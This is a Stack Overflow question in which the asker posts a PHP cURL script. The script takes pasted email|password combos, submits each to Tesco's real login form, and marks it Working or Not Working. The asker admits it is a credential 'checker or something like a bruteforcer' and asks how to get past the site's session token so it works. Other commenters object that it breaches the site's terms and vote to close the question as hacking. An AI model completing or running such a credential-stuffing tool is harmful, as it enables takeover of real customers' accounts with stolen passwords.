# I don't know how to get the Session ID from the Header when Posting Data on cURL PHP

Tags: php, curl, php-curl

I'm trying to play with the website "tesco.com"

Here is my code below:

```
<?php

Class Checker{


public function curl($url,$post = false,$info = false)

{

$agent= 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)';

$curl = curl_init($url);
if($post !== false)

{

curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl,CURLOPT_POST,1);

}






curl_setopt($curl, CURLOPT_TIMEOUT, 10);
curl_setopt($curl,CURLOPT_USERAGENT, $agent);
curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
curl_setopt($curl, CURLOPT_REFERER, "https://secure.tesco.com/direct/my/register.page");
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,  'cookie.txt');
curl_setopt($curl, CURLOPT_COOKIESESSION, true);


if($info !== false)



{



curl_setopt($curl, CURLOPT_URL, $info);
curl_setopt($curl, CURLOPT_CUSTOMREQUEST, 'GET');



}



$data = curl_exec($curl);



return $data;



}



}







$security = explode("\r\n", $_POST['security']);
$checker = new Checker();

if($_POST['initiate']){


foreach($security as $userlogin)



{



$combo = explode("|",$userlogin);
$email = $combo[0];
$pass  = $combo[1];



if($pass != ""){


$splittalk = split("@",$email);
$usertalk = $splittalk[0];
$domaintalk = $splittalk[1];
$emailencode = str_replace("@","%40",$email);
$csrfmiddlewaretoken = explode('_csrf',file_get_contents(realpath('.').'/cookie.txt'));
$csrfmiddlewaretoken = trim($csrfmiddlewaretoken[1]);

$post = "_dyncharset=utf-8&_dynSessConf=-7028765781423058569&signin-email=".$emailencode."&_D%3Asignin-email=+&signin-password=".$pass."&_D%3Asignin-password=+&signin-button=Sign+in&_D%3Asignin-button=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.loginErrorURL=%2Fdirect%2Fmy%2Fregister.page&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.loginErrorURL=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.loginSuccessURL=%2Fdirect%2F&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.loginSuccessURL=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.formValue.registerType=full&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.formValue.registerType=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.value.userId=&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.value.userId=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.value.tokenGenerated=&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.value.tokenGenerated=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.formValue.finalSuccessURL=%2Fdirect%2F&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.formValue.finalSuccessURL=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.basketErrorURL=%2Fdirect%2Fbasket-details%2Fbasket-details.page&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.basketErrorURL=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.jsCheckForCheckout=true&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.jsCheckForCheckout=+&_DARGS=%2Fblocks%2Flogin%2FintegratedRegistration%2Fir-login.jsp";



$securitycheck = $checker->curl("https://secure.tesco.com/direct/my/register.page?_DARGS=/blocks/login/integratedRegistration/ir-login.jsp",$post);



$now = "<p style=\"color:blue\">Checked by UG-Clarck at ".date("g:i a - F j, Y")."</p>";



if(preg_match('/Your email address and password/', $securitycheck))



{

    echo "<font color=red><b>Not Working</b></font> ~ ".$email."|".$pass." - ".$now."<br/>";


}



else{

    echo "<font color=lime><b>Working</b></font> ~ ".$email."|".$pass." - ".$now."<br/>";
}


}



}



}



?>
```

My problem is that in the $post where the _dynSessConf= something like a session ID on the header? I've got no idea what it calls. So my problem is whenever I execute this on my hosting I keep getting Working even the log is fake. I tried to execute the https://secure.tesco.com/direct/my/register.page?_DARGS=/blocks/login/integratedRegistration/ir-login.jsp along with the post data but I get an error redirection telling the page has been deleted or something like that. But when I get a new _dynSessConf= ID the post data is being executed but for only the current browser I'm using but when I execute this with private browsing it redirects me to the error page telling it has been deleted.

Comment: what do you want to bet this is a breach of the sites TOS?

Comment: Well yes. I'm trying to make a checker or something like a bruteforcer actually.. but what do you mean by "bet" ? I'm new to stackoverflow.com I'm sorry.

Comment: got no idea if someone can help me with this kind of problem z.z here at stackoverflow

Comment: I'm voting to close this question as off-topic because the OP wants help to hack a web site